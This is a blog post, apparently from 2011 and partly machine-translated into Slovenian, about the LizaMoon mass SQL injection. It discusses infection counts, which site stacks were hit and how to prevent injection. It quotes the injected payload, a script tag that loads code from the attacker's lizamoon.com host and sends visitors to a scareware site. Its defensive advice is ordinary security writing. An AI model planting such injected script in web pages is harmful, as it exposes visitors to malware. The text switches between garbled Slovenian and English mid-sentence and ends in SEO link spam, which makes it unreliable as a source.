Velika Lizamoon SQL Injection Attack – Marec-april 2011



No – Petek stvari se je začela zanimiva za tehnologijo straneh novice. Večina strani so delovali lažnih bedaki maj zgodbe in nekaj tudi Websense je tekoče z velikim napadom dogaja pred mnogimi SQL, ki temeljijo na spletnih straneh. Podrobnosti so razdrobljeni – Ljudje so povedali, da si za ur.php datotek na njihovi spletni imenik (kar ni ravno dober test, da vidim, če je vaša stran okuženih s to SQL injection…) “<script src = http://lizamoon.com / ur.php”> je primer kode, ki se vstavi v podatkovnih baz SQL in kaj pravzaprav počne, je obiskovalce silijo, da obiščejo scareware mesto, kjer se malware lahko nameščen na svojem računalniku, ki trdi, da imajo virus…. (koliko od tistih, ki smo jih videli v zadnji 5-10 let?)

Eden od mojih sitnost s tech novice (zlasti virus novice) Pokritost je, da ko zgodba postane dovolj velika, da se pokrivajo z velikimi mediji, nikoli ji dela krivico. Želim informacije. Kaj je to napad? Kateri programi so ranljivi, Ali obstaja vzorec?


This is one of the things that annoyed me about the coverage of this particular beastie…. okay fine it’s an sql injectionis it mysql? ms-sql? some other blend? Is it attacking WordPress or drupal or movable type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated.) The best estimate I’ve seen is in the 200,000+ Območje. Google searches showed millions of pages with the suspect text although that included multiple pages per site and many sites that were simply reporting on the exploit.

So…. Saturday I was asked about it and I hadn’t been able to do much research. So, I did a bit of research and found that it seems most every site affected that had been identified by Websense was a Microsoft SQL backend. At that point I breath a bit easier in the fact that I won’t be urgently upgrading 50 or so MySQL based blog enginesIn fact after reading a bit further I essentially filed it for the weekend as I have nothing deployed that depends on MS-SQL.

Tako, today I was thinking that there must be some pattern as to what is vulnerable…. Looking at the google iskanje that shows the infected blurb of code….

I see .cfm pages, .asp pages, .aspx pages, I found a site with this powered by:

Mango BlogA ColdFusion blog engine

I see several other sites that seem to be database driven but it’s unclear what site design engine I’m lookiing out. Really the common denominator is asp/cold fusion and microsofts framework for web applications.

The best advice that is given is that you should always filter/sanitize input into databases. In other words don’t trust your site visitors to put in good things in forms. Trust them to try and break through to the database underneath by using characters that are going to give a hint to your database that it’s time to do a command instead of treating the input as text.

There is a good asp.net article on Preventing SQL injection.

It really is reminiscent of this great cartoon…. about little Bobby Tables….

Da je veliko povedal…. it seems that better advise is to paramaterize your SQL calls….

Good tutorial site on avoiding sql injection problems

I suspect there are many hundreds of site owners that still aren’t aware that they were compromised.

So here’s the flamebaitare poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it’s just a MS toolkit issuealthough the proliferation ofeasily make your own database driven sitetoolkit would seem to encourage sloppy design. (Da – Vem… open source based blog engines have had their share of sql injection issues too….)

Making it easy for anyone to make a database driven website does not mean everyone will follow best practices for validating input. (In fact in most things that I’ve seenmaking things easier seems to encourage cutting corners…)

Podobni Posts

Blog Traffic Exchange Podobni Posts
  • Phishing - toliko napak, da izkoristijo tako malo časa V zadnjem tednu je bilo dobro dokumentiran writeup navzkrižnega ranljivosti strani skriptnega kar je omogočilo phisher predstavlja kot paypal prijavo s potrdilom zakonit PayPal SSL .... Brian Krebs na varnostno Fix je nekaj podrobnosti o nekaterih novih in zanimivih načinov ......
  • Največji računalniški varnostna ranljivost, kdaj Govorim zelo malo o računalniških virusov in računalniška varnost na tej strani. To je verjetno eden izmed večjih problemov, ki sem se spoprijeti z za moje stranke. Danes bom govoril o največji računalniški varnostni ranljivosti obstaja. V resnici, To je splošna varnostna ranljivost. To ......
  • Macromedia Flash Player ranljivost Huda varnostna ranljivost, je na voljo v različicah Flash Player pred 7.0.19.0 Veliko spletnih strani zahtevajo flash player, da si ogledate različne funkcije na spletni strani (glede na to spletno stran sega od reklam na mestu navigacijo.) Posebej oblikovana swf na daljavo ......
Blog Traffic Exchange Sorodne spletne strani
  • Izboljšanje vaše spletne strani Ranking Z Off Page SEO Off-strani Search Engine Optimization je vse o uporabi SEO zunaj vaši spletni strani, namesto na njej. Za številne nove Internet marketingu, Ta izraz se lahko zdi, da so zavajajoče, ampak v aktualnost, to ni. Namen naslednjem prispevku je jasno nekaj napačnih in vam pomaga graditi ......
  • Essential SEO Tips For sure, SEO has definitely become a very important part of online marketing. Thus for that reason, you should equip yourself with some efficient SEO tips, so that you can really direct traffic to your web site and also boost your business. No, here are several essential tips that can......
  • Povečanje Blog Site Traffic Je privabljanju prometa spletnega dnevnika res težko Proposition? Ali obstaja resnično, neverjetno preprostih načinov, da lahko nova oseba, blogging povečanje prometa svoje spletnega dnevnika? Tukaj je nekaj načinov, ki jih lahko privabili nove prometa spletnega dnevnika na vašo spletno stran, ne da bi težko, pa tudi ......
PDF24    Pošlji članek po PDF   

Podobne objave


Poglejte, kaj se je zgodilo na ta dan v zgodovini bodisi iz BBC Wikipedia
Iskanje:
Ključne besede:
Amazon Logo

Komentarji so zaprti.


Preklopi na našo mobilno spletno stran